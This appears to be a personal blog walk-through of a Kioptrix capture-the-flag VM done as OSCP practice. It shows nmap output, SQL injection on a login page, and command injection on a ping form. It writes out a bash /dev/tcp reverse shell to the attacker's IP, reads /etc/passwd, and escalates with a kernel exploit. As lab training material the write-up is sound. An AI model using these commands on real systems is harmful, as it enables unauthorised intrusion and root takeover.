Back again with another OSCP like walk-through. The aim of this challenge is gain root access by any means necessary (similar to Kioptrix #1 except a little more challenging), you can grab this VM here.
So let’s start this challenge with the usual recon, a quick nmap scan of the VM shows a couple of ports open:
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|sshv1: Server supports SSHv1 80/tcp open http Apache httpd 2.0.52 ((CentOS)) |_http-server-header: Apache/2.0.52 (CentOS) |_http-title: Site doesn’t have a title (text/html; charset=UTF-8). 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100024 1 678/udp status | 100024 1 681/tcp status
443/tcp open ssl/https?
|ssl-date: 2018-01-14T17:58:04+00:00; +16h00m08s from scanner time. | sslv2: | SSLv2 supported | ciphers: | SSL2_RC4_128_WITH_MD5 | SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 | SSL2_RC4_128_EXPORT40_WITH_MD5 | SSL2_RC4_64_WITH_MD5 | SSL2_RC2_128_CBC_WITH_MD5 | SSL2_DES_64_CBC_WITH_MD5 | SSL2_DES_192_EDE3_CBC_WITH_MD5
631/tcp open ipp CUPS 1.1
|_ Potentially risky methods: PUT
|_http-title: 403 Forbidden
681/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
12169/tcp filtered unknown
13969/tcp filtered unknown
27162/tcp filtered unknown
36304/tcp filtered unknown
65180/tcp filtered unknown
MAC Address: 08:00:27:58:29:4A (Oracle VirtualBox virtual NIC)
Device type: general purpose|media device
Running: Linux 2.6.X, Star Track embedded
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:2.6.23 cpe:/h:star_track:srt2014hd
OS details: Linux 2.6.9 – 2.6.30, Star Track SRT2014HD satellite receiver (Linux 2.6.23)
Network Distance: 1 hop
Nmap shows us that there is a web server running, with a MySQL database and SSH. Visiting the web page reveals an administrator login portal.
Trying the usual easy username/password combinations doesn’t work, so its time to intercept the traffic and see if I can find anything I can exploit. The web app was created using PHP 4.3.9, maybe we can exploit that.
Nope, no exploits found using searchsploit, lets head back to the login page, maybe it’s vulnerable to SQLi. Boom, the page was susceptible to to SQL injection.
After poping the login page, we are presented with another page that allows us to ping IP addresses.
Since this page is just pinging IP addresses, it should be vulnerable to command injection.
Listing the directory shows two files, index.php and pingit.php. Lets see if I can cat the index page and find something interesting.
Not to valuable found in the file, lets see if we can /etc/passwd:
Ok so now we can see three user root, John and Harold. Brute-forcing passowords for these users gets me nothing, so lets go back to the pingit page see if we can create a reverse shell ; bash -i >& /dev/tcp/192.168.1.33/4444 0>&1. Now that I’m connected to, who am I on this box?
Ok so I’m apache user, let’s see if the index.php page has any credentials in it. Boom, john:hiroshima is the username:password combination for the MySQL database. Log into the database, nothing really to be gained in terms of root access, so lets move on
So, how can gain root access now? Sudo -i doesn’t work, let’s see if there are exploits for the Linux kernel 2.6.9. Score!! One privilege escalation exploit https://www.exploit-db.com/exploits/9542. As I can’t download the script directly onto the server, I’ll have to download the script to my machine and host it on a local server.
Placing the file in /var/www/html and start up apache (service apache2 start). Now, jump onto the Kioptrix box and download the script from my apache server. Compile the script with gcc, run it and boom, I am now root.
Overall, this challenge covers a lot of basic concepts and is a good VM to push beginners. Until next time, hack safe.